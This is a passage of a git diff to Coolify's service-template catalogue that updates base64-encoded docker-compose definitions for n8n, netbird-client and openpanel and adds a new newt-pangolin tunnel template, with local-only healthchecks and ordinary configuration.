tICdQT1NUR1JFU19EQj0ke1BPU1RHUkVTX0RCOi1uOG59JwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQtU0hFTEwKICAgICAgICAtICdwZ19pc3JlYWR5IC1VICQke1BPU1RHUkVTX1VTRVJ9IC1kICQke1BPU1RHUkVTX0RCfScKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDIwcwogICAgICByZXRyaWVzOiAxMAo=", "tags": [ "n8n", "workflow", @@ -2642,7 +2642,7 @@ "n8n": { "documentation": "https://n8n.io?utm_source=coolify.io", "slogan": "n8n is an extendable workflow automation tool.", - "compose": "c2VydmljZXM6CiAgbjhuOgogICAgaW1hZ2U6ICdkb2NrZXIubjhuLmlvL244bmlvL244bjoxLjExNC40JwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gU0VSVklDRV9VUkxfTjhOXzU2NzgKICAgICAgLSAnTjhOX0VESVRPUl9CQVNFX1VSTD0ke1NFUlZJQ0VfVVJMX044Tn0nCiAgICAgIC0gJ1dFQkhPT0tfVVJMPSR7U0VSVklDRV9VUkxfTjhOfScKICAgICAgLSAnTjhOX0hPU1Q9JHtTRVJWSUNFX1VSTF9OOE59JwogICAgICAtICdHRU5FUklDX1RJTUVaT05FPSR7R0VORVJJQ19USU1FWk9ORTotRXVyb3BlL0Jlcmxpbn0nCiAgICAgIC0gJ1RaPSR7VFo6LUV1cm9wZS9CZXJsaW59JwogICAgICAtICdEQl9TUUxJVEVfUE9PTF9TSVpFPSR7REJfU1FMSVRFX1BPT0xfU0laRTotM30nCiAgICAgIC0gJ044Tl9SVU5ORVJTX0VOQUJMRUQ9JHtOOE5fUlVOTkVSU19FTkFCTEVEOi10cnVlfScKICAgICAgLSAnTjhOX0JMT0NLX0VOVl9BQ0NFU1NfSU5fTk9ERT0ke044Tl9CTE9DS19FTlZfQUNDRVNTX0lOX05PREU6LXRydWV9JwogICAgICAtICdOOE5fR0lUX05PREVfRElTQUJMRV9CQVJFX1JFUE9TPSR7TjhOX0dJVF9OT0RFX0RJU0FCTEVfQkFSRV9SRVBPUzotdHJ1ZX0nCiAgICAgIC0gJ044Tl9FTkZPUkNFX1NFVFRJTkdTX0ZJTEVfUEVSTUlTU0lPTlM9JHtOOE5fRU5GT1JDRV9TRVRUSU5HU19GSUxFX1BFUk1JU1NJT05TOi10cnVlfScKICAgICAgLSAnTjhOX1BST1hZX0hPUFM9JHtOOE5fUFJPWFlfSE9QUzotMX0nCiAgICB2b2x1bWVzOgogICAgICAtICduOG4tZGF0YTovaG9tZS9ub2RlLy5uOG4nCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRC1TSEVMTAogICAgICAgIC0gJ3dnZXQgLXFPLSBodHRwOi8vMTI3LjAuMC4xOjU2NzgvJwogICAgICBpbnRlcnZhbDogNXMKICAgICAgdGltZW91dDogMjBzCiAgICAgIHJldHJpZXM6IDEwCg==", + "compose": "c2VydmljZXM6CiAgbjhuOgogICAgaW1hZ2U6ICdkb2NrZXIubjhuLmlvL244bmlvL244bjoxLjExOS4yJwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gU0VSVklDRV9VUkxfTjhOXzU2NzgKICAgICAgLSAnTjhOX0VESVRPUl9CQVNFX1VSTD0ke1NFUlZJQ0VfVVJMX044Tn0nCiAgICAgIC0gJ1dFQkhPT0tfVVJMPSR7U0VSVklDRV9VUkxfTjhOfScKICAgICAgLSAnTjhOX0hPU1Q9JHtTRVJWSUNFX1VSTF9OOE59JwogICAgICAtICdHRU5FUklDX1RJTUVaT05FPSR7R0VORVJJQ19USU1FWk9ORTotRXVyb3BlL0Jlcmxpbn0nCiAgICAgIC0gJ1RaPSR7VFo6LUV1cm9wZS9CZXJsaW59JwogICAgICAtICdEQl9TUUxJVEVfUE9PTF9TSVpFPSR7REJfU1FMSVRFX1BPT0xfU0laRTotM30nCiAgICAgIC0gJ044Tl9SVU5ORVJTX0VOQUJMRUQ9JHtOOE5fUlVOTkVSU19FTkFCTEVEOi10cnVlfScKICAgICAgLSAnTjhOX0JMT0NLX0VOVl9BQ0NFU1NfSU5fTk9ERT0ke044Tl9CTE9DS19FTlZfQUNDRVNTX0lOX05PREU6LXRydWV9JwogICAgICAtICdOOE5fR0lUX05PREVfRElTQUJMRV9CQVJFX1JFUE9TPSR7TjhOX0dJVF9OT0RFX0RJU0FCTEVfQkFSRV9SRVBPUzotdHJ1ZX0nCiAgICAgIC0gJ044Tl9FTkZPUkNFX1NFVFRJTkdTX0ZJTEVfUEVSTUlTU0lPTlM9JHtOOE5fRU5GT1JDRV9TRVRUSU5HU19GSUxFX1BFUk1JU1NJT05TOi10cnVlfScKICAgICAgLSAnTjhOX1BST1hZX0hPUFM9JHtOOE5fUFJPWFlfSE9QUzotMX0nCiAgICB2b2x1bWVzOgogICAgICAtICduOG4tZGF0YTovaG9tZS9ub2RlLy5uOG4nCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRC1TSEVMTAogICAgICAgIC0gJ3dnZXQgLXFPLSBodHRwOi8vMTI3LjAuMC4xOjU2NzgvJwogICAgICBpbnRlcnZhbDogNXMKICAgICAgdGltZW91dDogMjBzCiAgICAgIHJldHJpZXM6IDEwCg==", "tags": [ "n8n", "workflow", @@ -2689,7 +2689,7 @@ "netbird-client": { "documentation": "https://docs.netbird.io/how-to/examples#net-bird-client-in-docker?utm_source=coolify.io", "slogan": "Connect your devices into a secure WireGuard\u00ae-based overlay network with SSO, MFA and granular access controls.", - "compose": "c2VydmljZXM6CiAgbmV0YmlyZC1jbGllbnQ6CiAgICBpbWFnZTogJ25ldGJpcmRpby9uZXRiaXJkOmxhdGVzdCcKICAgIGVudmlyb25tZW50OgogICAgICAtICdOQl9TRVRVUF9LRVk9JHtOQl9TRVRVUF9LRVl9JwogICAgICAtICdOQl9FTkFCTEVfUk9TRU5QQVNTPSR7TkJfRU5BQkxFX1JPU0VOUEFTUzotZmFsc2V9JwogICAgICAtICdOQl9FTkFCTEVfRVhQRVJJTUVOVEFMX0xBWllfQ09OTj0ke05CX0VOQUJMRV9FWFBFUklNRU5UQUxfTEFaWV9DT05OOi1mYWxzZX0nCiAgICB2b2x1bWVzOgogICAgICAtICduZXRiaXJkLWNsaWVudDovZXRjL25ldGJpcmQnCiAgICBjYXBfYWRkOgogICAgICAtIE5FVF9BRE1JTgogICAgICAtIFNZU19BRE1JTgogICAgICAtIFNZU19SRVNPVVJDRQogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQKICAgICAgICAtIG5ldGJpcmQKICAgICAgICAtIHZlcnNpb24KICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDIwcwogICAgICByZXRyaWVzOiAxMAo=", + "compose": "c2VydmljZXM6CiAgbmV0YmlyZC1jbGllbnQ6CiAgICBpbWFnZTogJ25ldGJpcmRpby9uZXRiaXJkOmxhdGVzdCcKICAgIG5ldHdvcmtfbW9kZTogaG9zdAogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gJ05CX1NFVFVQX0tFWT0ke05CX1NFVFVQX0tFWX0nCiAgICAgIC0gJ05CX0VOQUJMRV9ST1NFTlBBU1M9JHtOQl9FTkFCTEVfUk9TRU5QQVNTOi1mYWxzZX0nCiAgICAgIC0gJ05CX0VOQUJMRV9FWFBFUklNRU5UQUxfTEFaWV9DT05OPSR7TkJfRU5BQkxFX0VYUEVSSU1FTlRBTF9MQVpZX0NPTk46LWZhbHNlfScKICAgIHZvbHVtZXM6CiAgICAgIC0gJ25ldGJpcmQtY2xpZW50Oi9ldGMvbmV0YmlyZCcKICAgIGNhcF9hZGQ6CiAgICAgIC0gTkVUX0FETUlOCiAgICAgIC0gU1lTX0FETUlOCiAgICAgIC0gU1lTX1JFU09VUkNFCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRAogICAgICAgIC0gbmV0YmlyZAogICAgICAgIC0gdmVyc2lvbgogICAgICBpbnRlcnZhbDogNXMKICAgICAgdGltZW91dDogMjBzCiAgICAgIHJldHJpZXM6IDEwCg==", "tags": [ "wireguard", "mesh-networks", @@ -2717,6 +2717,20 @@ "minversion": "0.0.0", "port": "3000" }, + "newt-pangolin": { + "documentation": "https://docs.digpangolin.com/manage/sites/install-site?utm_source=coolify.io", + "slogan": "Pangolin tunnels your services to the internet so you can access anything from anywhere.", + "compose": "c2VydmljZXM6CiAgbmV3dDoKICAgIGltYWdlOiAnZm9zcmwvbmV3dDpsYXRlc3QnCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSAnUEFOR09MSU5fRU5EUE9JTlQ9JHtQQU5HT0xJTl9FTkRQT0lOVDotaHR0cHM6Ly9wYW5nb2xpbi5kb21haW4udGxkfScKICAgICAgLSAnTkVXVF9JRD0ke05FV1RfSUQ6P30nCiAgICAgIC0gJ05FV1RfU0VDUkVUPSR7TkVXVF9TRUNSRVQ6P30nCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRAogICAgICAgIC0gbmV3dAogICAgICAgIC0gJy0tdmVyc2lvbicKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDIwcwogICAgICByZXRyaWVzOiAxMAo=", + "tags": [ + "wireguard", + "reverse-proxy", + "zero-trust-network-access", + "open source" + ], + "category": null, + "logo": "svgs/pangolin-logo.png", + "minversion": "0.0.0" + }, "next-image-transformation": { "documentation": "https://github.com/coollabsio/next-image-transformation?utm_source=coolify.io", "slogan": "Drop-in replacement for Vercel's Nextjs image optimization service.", @@ -3039,7 +3053,7 @@ "openpanel": { "documentation": "https://openpanel.dev/docs?utm_source=coolify.io", "slogan": "Open source alternative to Mixpanel and Plausible for product analytics", - "compose": "c2VydmljZXM6CiAgb3BlbnBhbmVsLWRhc2hib2FyZDoKICAgIGltYWdlOiAnbGluZGVzdmFyZC9vcGVucGFuZWwtZGFzaGJvYXJkOmxhdGVzdCcKICAgIGVudmlyb25tZW50OgogICAgICAtIE5PREVfRU5WPXByb2R1Y3Rpb24KICAgICAgLSBORVhUX1BVQkxJQ19TRUxGX0hPU1RFRD10cnVlCiAgICAgIC0gU0VSVklDRV9VUkxfT1BEQVNIQk9BUkRfMzAwMAogICAgICAtICdORVhUX1BVQkxJQ19BUElfVVJMPSR7U0VSVklDRV9VUkxfT1BBUEl9JwogICAgICAtICdORVhUX1BVQkxJQ19EQVNIQk9BUkRfVVJMPSR7U0VSVklDRV9VUkxfT1BEQVNIQk9BUkR9JwogICAgICAtICdEQVRBQkFTRV9VUkw9cG9zdGdyZXM6Ly8ke1NFUlZJQ0VfVVNFUl9QT1NUR1JFU306JHtTRVJWSUNFX1BBU1NXT1JEX1BPU1RHUkVTfUBwb3N0Z3Jlczo1NDMyLyR7T1BFTlBBTkVMX1BPU1RHUkVTX0RCOi1vcGVucGFuZWwtZGJ9P3NjaGVtYT1wdWJsaWMnCiAgICAgIC0gJ1JFRElTX1VSTD1yZWRpczovL2RlZmF1bHQ6JHtTRVJWSUNFX1BBU1NXT1JEX1JFRElTfUByZWRpczo2Mzc5JwogICAgICAtICdDTElDS0hPVVNFX1VSTD1odHRwOi8vY2xpY2tob3VzZTo4MTIzL29wZW5wYW5lbCcKICAgIGRlcGVuZHNfb246CiAgICAgIG9wZW5wYW5lbC1hcGk6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgICAgb3BlbnBhbmVsLXdvcmtlcjoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgICBwb3N0Z3JlczoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgICByZWRpczoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgICBjbGlja2hvdXNlOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRC1TSEVMTAogICAgICAgIC0gJ2N1cmwgLWYgaHR0cDovL2xvY2FsaG9zdDozMDAwL2FwaS9oZWFsdGhjaGVjayB8fCBleGl0IDEnCiAgICAgIGludGVydmFsOiAxMHMKICAgICAgdGltZW91dDogNXMKICAgICAgcmV0cmllczogNQogICAgICBzdGFydF9wZXJpb2Q6IDE1cwogIG9wZW5wYW5lbC1hcGk6CiAgICBpbWFnZTogJ2xpbmRlc3ZhcmQvb3BlbnBhbmVsLWFwaTpsYXRlc3QnCiAgICBjb21tYW5kOiAic2ggLWMgXCJcbiAgZWNobyAnUnVubmluZyBtaWdyYXRpb25zLi4uJ1xuICBDST10cnVlIHBucG0gLXIgcnVuIG1pZ3JhdGU6ZGVwbG95XG5cbiAgcG5wbSBzdGFydFxuXCJcbiIKICAgIGVudmlyb25tZW50OgogICAgICAtIE5PREVfRU5WPXByb2R1Y3Rpb24KICAgICAgLSBORVhUX1BVQkxJQ19TRUxGX0hPU1RFRD10cnVlCiAgICAgIC0gU0VSVklDRV9VUkxfT1BBUEkKICAgICAgLSAnTkVYVF9QVUJMSUNfQVBJX1VSTD0ke1NFUlZJQ0VfVVJMX09QQVBJfScKICAgICAgLSAnTkVYVF9QVUJMSUNfREFTSEJPQVJEX1VSTD0ke1NFUlZJQ0VfVVJMX09QREFTSEJPQVJEfScKICAgICAgLSAnREFUQUJBU0VfVVJMPXBvc3RncmVzOi8vJHtTRVJWSUNFX1VTRVJfUE9TVEdSRVN9OiR7U0VSVklDRV9QQVNTV09SRF9QT1NUR1JFU31AcG9zdGdyZXM6NTQzMi8ke09QRU5QQU5FTF9QT1NUR1JFU19EQjotb3BlbnBhbmVsLWRifT9zY2hlbWE9cHVibGljJwogICAgICAtICdEQVRBQkFTRV9VUkxfRElSRUNUPXBvc3RncmVzOi8vJHtTRVJWSUNFX1VTRVJfUE9TVEdSRVN9OiR7U0VSVklDRV9QQVNTV09SRF9QT1NUR1JFU31AcG9zdGdyZXM6NTQzMi8ke09QRU5QQU5FTF9QT1NUR1JFU19EQjotb3BlbnBhbmVsLWRifT9zY2hlbWE9cHVibGljJwogICAgICAtICdSRURJU19VUkw9cmVkaXM6Ly9kZWZhdWx0OiR7U0VSVklDRV9QQVNTV09SRF9SRURJU31AcmVkaXM6NjM3OScKICAgICAgLSAnQ0xJQ0tIT1VTRV9VUkw9aHR0cDovL2NsaWNraG91c2U6ODEyMy9vcGVucGFuZWwnCiAgICAgIC0gJ0NPT0tJRV9TRUNSRVQ9JHtTRVJWSUNFX0JBU0U2NF9DT09LSUVTRUNSRVR9JwogICAgICAtICdBTExPV19SRUdJU1RSQVRJT049JHtPUEVOUEFORUxfQUxMT1dfUkVHSVNUUkFUSU9OOi1mYWxzZX0nCiAgICAgIC0gJ0FMTE9XX0lOVklUQVRJT049JHtPUEVOUEFORUxfQUxMT1dfSU5WSVRBVElPTjotZmFsc2V9JwogICAgICAtICdFTUFJTF9TRU5ERVI9JHtPUEVOUEFORUxfRU1BSUxfU0VOREVSfScKICAgICAgLSAnUkVTRU5EX0FQSV9LRVk9JHtSRVNFTkRfQVBJX0tFWX0nCiAgICBkZXBlbmRzX29uOgogICAgICBwb3N0Z3JlczoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgICBjbGlja2hvdXNlOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgICAgIHJlZGlzOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRC1TSEVMTAogICAgICAgIC0gJ2N1cmwgLWYgaHR0cDovL2xvY2FsaG9zdDozMDAwL2hlYWx0aGNoZWNrIHx8IGV4aXQgMScKICAgICAgaW50ZXJ2YWw6IDEwcwogICAgICB0aW1lb3V0OiA1cwogICAgICByZXRyaWVzOiA1CiAgb3BlbnBhbmVsLXdvcmtlcjoKICAgIGltYWdlOiAnbGluZGVzdmFyZC9vcGVucGFuZWwtd29ya2VyOmxhdGVzdCcKICAgIGVudmlyb25tZW50OgogICAgICAtIE5PREVfRU5WPXByb2R1Y3Rpb24KICAgICAgLSBORVhUX1BVQkxJQ19TRUxGX0hPU1RFRD10cnVlCiAgICAgIC0gU0VSVklDRV9VUkxfT1BCVUxMQk9BUkQKICAgICAgLSAnTkVYVF9QVUJMSUNfQVBJX1VSTD0ke1NFUlZJQ0VfVVJMX09QQVBJfScKICAgICAgLSAnREFUQUJBU0VfVVJMPXBvc3RncmVzOi8vJHtTRVJWSUNFX1VTRVJfUE9TVEdSRVN9OiR7U0VSVklDRV9QQVNTV09SRF9QT1NUR1JFU31AcG9zdGdyZXM6NTQzMi8ke09QRU5QQU5FTF9QT1NUR1JFU19EQjotb3BlbnBhbmVsLWRifT9zY2hlbWE9cHVibGljJwogICAgICAtICdEQVRBQkFTRV9VUkxfRElSRUNUPXBvc3RncmVzOi8vJHtTRVJWSUNFX1VTRVJfUE9TVEdSRVN9OiR7U0VSVklDRV9QQVNTV09SRF9QT1NUR1JFU31AcG9zdGdyZXM6NTQzMi8ke09QRU5QQU5FTF9QT1NUR1JFU19EQjotb3BlbnBhbmVsLWRifT9zY2hlbWE9cHVibGljJwogICAgICAtICdSRURJU19VUkw9cmVkaXM6Ly9kZWZhdWx0OiR7U0VSVklDRV9QQVNTV09SRF9SRURJU31AcmVkaXM6NjM3OScKICAgICAgLSAnQ0xJQ0tIT1VTRV9VUkw9aHR0cDovL2NsaWNraG91c2U6ODEyMy9vcGVucGFuZWwnCiAgICBkZXBlbmRzX29uOgogICAgICBvcGVucGFuZWwtYXBpOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgICAgIHBvc3RncmVzOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgICAgIHJlZGlzOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgICAgIGNsaWNraG91c2U6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ELVNIRUxMCiAgICAgICAgLSAnY3VybCAtZiBodHRwOi8vbG9jYWxob3N0OjMwMDAvaGVhbHRoY2hlY2sgfHwgZXhpdCAxJwogICAgICBpbnRlcnZhbDogMTBzCiAgICAgIHRpbWVvdXQ6IDVzCiAgICAgIHJldHJpZXM6IDUKICAgICAgc3RhcnRfcGVyaW9kOiA1cwogIHBvc3RncmVzOgogICAgaW1hZ2U6ICdwb3N0Z3JlczoxNi1hbHBpbmUnCiAgICB2b2x1bWVzOgogICAgICAtICdvcGVucGFuZWxfcG9zdGdyZXNfZGF0YTovdmFyL2xpYi9wb3N0Z3Jlc3FsL2RhdGEnCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSAnUE9TVEdSRVNfREI9JHtPUEVOUEFORUxfUE9TVEdSRVNfREI6LW9wZW5wYW5lbC1kYn0nCiAgICAgIC0gJ1BPU1RHUkVTX1VTRVI9JHtTRVJWSUNFX1VTRVJfUE9TVEdSRVN9JwogICAgICAtICdQT1NUR1JFU19QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVN9JwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQtU0hFTEwKICAgICAgICAtICdwZ19pc3JlYWR5IC1VICQke1BPU1RHUkVTX1VTRVJ9IC1kICQke1BPU1RHUkVTX0RCfScKICAgICAgaW50ZXJ2YWw6IDEwcwogICAgICB0aW1lb3V0OiA1cwogICAgICByZXRyaWVzOiA1CiAgcmVkaXM6CiAgICBpbWFnZTogJ3JlZGlzOjcuNC1hbHBpbmUnCiAgICB2b2x1bWVzOgogICAgICAtICdvcGVucGFuZWxfcmVkaXNfZGF0YTovZGF0YScKICAgIGVudmlyb25tZW50OgogICAgICAtICdSRURJU19QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfUkVESVN9JwogICAgY29tbWFuZDogJ3JlZGlzLXNlcnZlciAtLXJlcXVpcmVwYXNzICR7U0VSVklDRV9QQVNTV09SRF9SRURJU30gLS1tYXhtZW1vcnktcG9saWN5IG5vZXZpY3Rpb24nCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRAogICAgICAgIC0gcmVkaXMtY2xpCiAgICAgICAgLSAnLWEnCiAgICAgICAgLSAnJHtTRVJWSUNFX1BBU1NXT1JEX1JFRElTfScKICAgICAgICAtIHBpbmcKICAgICAgaW50ZXJ2YWw6IDEwcwogICAgICB0aW1lb3V0OiA1cwogICAgICByZXRyaWVzOiA1CiAgY2xpY2tob3VzZToKICAgIGltYWdlOiAnY2xpY2tob3VzZS9jbGlja2hvdXNlLXNlcnZlcjoyNC4zLjItYWxwaW5lJwogICAgdm9sdW1lczoKICAgICAgLSAnb3BlbnBhbmVsX2NsaWNraG91c2VfZGF0YTovdmFyL2xpYi9jbGlja2hvdXNlJwogICAgICAtICdvcGVucGFuZWxfY2xpY2tob3VzZV9sb2dzOi92YXIvbG9nL2NsaWNraG91c2Utc2VydmVyJwogICAgICAtCiAgICAgICAgdHlwZTogYmluZAogICAgICAgIHNvdXJjZTogLi9jbGlja2hvdXNlLWNvbmZpZy54bWwKICAgICAgICB0YXJnZXQ6IC9ldGMvY2xpY2tob3VzZS1zZXJ2ZXIvY29uZmlnLmQvb3AtY29uZmlnLnhtbAogICAgICAgIHJlYWRfb25seTogdHJ1ZQogICAgICAgIGNvbnRlbnQ6ICI8Y2xpY2tob3VzZT5cbiAgICA8bG9nZ2VyPlxuICAgICAgICA8bGV2ZWw+d2FybmluZzwvbGV2ZWw+XG4gICAgICAgIDxjb25zb2xlPnRydWU8L2NvbnNvbGU+XG4gICAgPC9sb2dnZXI+XG4gICAgPGtlZXBfYWxpdmVfdGltZW91dD4xMDwva2VlcF9hbGl2ZV90aW1lb3V0PlxuICAgIDwhLS0gU3RvcCBhbGwgdGhlIHVubmVjZXNzYXJ5IGxvZ2dpbmcgLS0+XG4gICAgPHF1ZXJ5X3RocmVhZF9sb2cgcmVtb3ZlPVwicmVtb3ZlXCIvPlxuICAgIDxxdWVyeV9sb2cgcmVtb3ZlPVwicmVtb3ZlXCIvPlxuICAgIDx0ZXh0X2xvZyByZW1vdmU9XCJyZW1vdmVcIi8+XG4gICAgPHRyYWNlX2xvZyByZW1vdmU9XCJyZW1vdmVcIi8+XG4gICAgPG1ldHJpY19sb2cgcmVtb3ZlPVwicmVtb3ZlXCIvPlxuICAgIDxhc3luY2hyb25vdXNfbWV0cmljX2xvZyByZW1vdmU9XCJyZW1vdmVcIi8+XG4gICAgPHNlc3Npb25fbG9nIHJlbW92ZT1cInJlbW92ZVwiLz5cbiAgICA8cGFydF9sb2cgcmVtb3ZlPVwicmVtb3ZlXCIvPlxuICAgIDxsaXN0ZW5faG9zdD4wLjAuMC4wPC9saXN0ZW5faG9zdD5cbiAgICA8aW50ZXJzZXJ2ZXJfbGlzdGVuX2hvc3Q+MC4wLjAuMDwvaW50ZXJzZXJ2ZXJfbGlzdGVuX2hvc3Q+XG4gICAgPGludGVyc2VydmVyX2h0dHBfaG9zdD5vcGNoPC9pbnRlcnNlcnZlcl9odHRwX2hvc3Q+XG4gICAgPCEtLSBEaXNhYmxlIGNncm91cCBtZW1vcnkgb2JzZXJ2ZXIgLS0+XG4gICAgPGNncm91cHNfbWVtb3J5X3VzYWdlX29ic2VydmVyX3dhaXRfdGltZT4wPC9jZ3JvdXBzX21lbW9yeV91c2FnZV9vYnNlcnZlcl93YWl0X3RpbWU+XG4gICAgPCEtLSBOb3QgdXNlZCBhbnltb3JlLCBidXQga2VwdCBmb3IgYmFja3dhcmRzIGNvbXBhdGliaWxpdHkgLS0+XG4gICAgPG1hY3Jvcz5cbiAgICAgICAgPHNoYXJkPjE8L3NoYXJkPlxuICAgICAgICA8cmVwbGljYT5yZXBsaWNhMTwvcmVwbGljYT5cbiAgICAgICAgPGNsdXN0ZXI+b3BlbnBhbmVsX2NsdXN0ZXI8L2NsdXN0ZXI+XG4gICAgPC9tYWNyb3M+XG48L2NsaWNraG91c2U+IgogICAgICAtCiAgICAgICAgdHlwZTogYmluZAogICAgICAgIHNvdXJjZTogLi9jbGlja2hvdXNlLXVzZXItY29uZmlnLnhtbAogICAgICAgIHRhcmdldDogL2V0Yy9jbGlja2hvdXNlLXNlcnZlci91c2Vycy5kL29wLXVzZXItY29uZmlnLnhtbAogICAgICAgIHJlYWRfb25seTogdHJ1ZQogICAgICAgIGNvbnRlbnQ6ICI8Y2xpY2tob3VzZT5cbiAgICA8cHJvZmlsZXM+XG4gICAgICAgIDxkZWZhdWx0PlxuICAgICAgICAgICAgPGxvZ19xdWVyaWVzPjA8L2xvZ19xdWVyaWVzPlxuICAgICAgICAgICAgPGxvZ19xdWVyeV90aHJlYWRzPjA8L2xvZ19xdWVyeV90aHJlYWRzPlxuICAgICAgICA8L2RlZmF1bHQ+XG4gICAgPC9wcm9maWxlcz5cbjwvY2xpY2tob3VzZT5cbiIKICAgICAgLQogICAgICAgIHR5cGU6IGJpbmQKICAgICAgICBzb3VyY2U6IC4vaW5pdC1kYi5zaAogICAgICAgIHRhcmdldDogL2RvY2tlci1lbnRyeXBvaW50LWluaXRkYi5kL2luaXQtZGIuc2gKICAgICAgICBjb250ZW50OiAiIyEvYmluL3NoXG5zZXQgLWVcblxuY2xpY2tob3VzZSBjbGllbnQgLW4gPDwtRU9TUUxcbiAgQ1JFQVRFIERBVEFCQVNFIElGIE5PVCBFWElTVFMgb3BlbnBhbmVsO1xuRU9TUUwiCiAgICB1bGltaXRzOgogICAgICBub2ZpbGU6CiAgICAgICAgc29mdDogMjYyMTQ0CiAgICAgICAgaGFyZDogMjYyMTQ0CiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRC1TSEVMTAogICAgICAgIC0gJ2NsaWNraG91c2UtY2xpZW50IC0tcXVlcnkgIlNFTEVDVCAxIicKICAgICAgaW50ZXJ2YWw6IDEwcwogICAgICB0aW1lb3V0OiA1cwogICAgICByZXRyaWVzOiA1Cg==", + "compose": "c2VydmljZXM6CiAgb3BlbnBhbmVsLWRhc2hib2FyZDoKICAgIGltYWdlOiAnbGluZGVzdmFyZC9vcGVucGFuZWwtZGFzaGJvYXJkOmxhdGVzdCcKICAgIGVudmlyb25tZW50OgogICAgICAtIE5PREVfRU5WPXByb2R1Y3Rpb24KICAgICAgLSBORVhUX1BVQkxJQ19TRUxGX0hPU1RFRD10cnVlCiAgICAgIC0gU0VSVklDRV9VUkxfT1BEQVNIQk9BUkRfMzAwMAogICAgICAtICdORVhUX1BVQkxJQ19BUElfVVJMPSR7U0VSVklDRV9VUkxfT1BBUEl9JwogICAgICAtICdORVhUX1BVQkxJQ19EQVNIQk9BUkRfVVJMPSR7U0VSVklDRV9VUkxfT1BEQVNIQk9BUkR9JwogICAgICAtICdEQVRBQkFTRV9VUkw9cG9zdGdyZXM6Ly8ke1NFUlZJQ0VfVVNFUl9QT1NUR1JFU306JHtTRVJWSUNFX1BBU1NXT1JEX1BPU1RHUkVTfUBwb3N0Z3Jlczo1NDMyLyR7T1BFTlBBTkVMX1BPU1RHUkVTX0RCOi1vcGVucGFuZWwtZGJ9P3NjaGVtYT1wdWJsaWMnCiAgICAgIC0gJ1JFRElTX1VSTD1yZWRpczovL2RlZmF1bHQ6JHtTRVJWSUNFX1BBU1NXT1JEX1JFRElTfUByZWRpczo2Mzc5JwogICAgICAtICdDTElDS0hPVVNFX1VSTD1odHRwOi8vY2xpY2tob3VzZTo4MTIzL29wZW5wYW5lbCcKICAgIGRlcGVuZHNfb246CiAgICAgIG9wZW5wYW5lbC1hcGk6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgICAgb3BlbnBhbmVsLXdvcmtlcjoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgICBwb3N0Z3JlczoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgICByZWRpczoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgICBjbGlja2hvdXNlOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRC1TSEVMTAogICAgICAgIC0gJ2N1cmwgLWYgaHR0cDovL2xvY2FsaG9zdDozMDAwL2FwaS9oZWFsdGhjaGVjayB8fCBleGl0IDEnCiAgICAgIGludGVydmFsOiAxMHMKICAgICAgdGltZW91dDogNXMKICAgICAgcmV0cmllczogNQogICAgICBzdGFydF9wZXJpb2Q6IDE1cwogIG9wZW5wYW5lbC1hcGk6CiAgICBpbWFnZTogJ2xpbmRlc3ZhcmQvb3BlbnBhbmVsLWFwaTpsYXRlc3QnCiAgICBjb21tYW5kOiAic2ggLWMgXCJcbiAgZWNobyAnUnVubmluZyBtaWdyYXRpb25zLi4uJ1xuICBDST10cnVlIHBucG0gLXIgcnVuIG1pZ3JhdGU6ZGVwbG95XG5cbiAgcG5wbSBzdGFydFxuXCJcbiIKICAgIGVudmlyb25tZW50OgogICAgICAtIE5PREVfRU5WPXByb2R1Y3Rpb24KICAgICAgLSBORVhUX1BVQkxJQ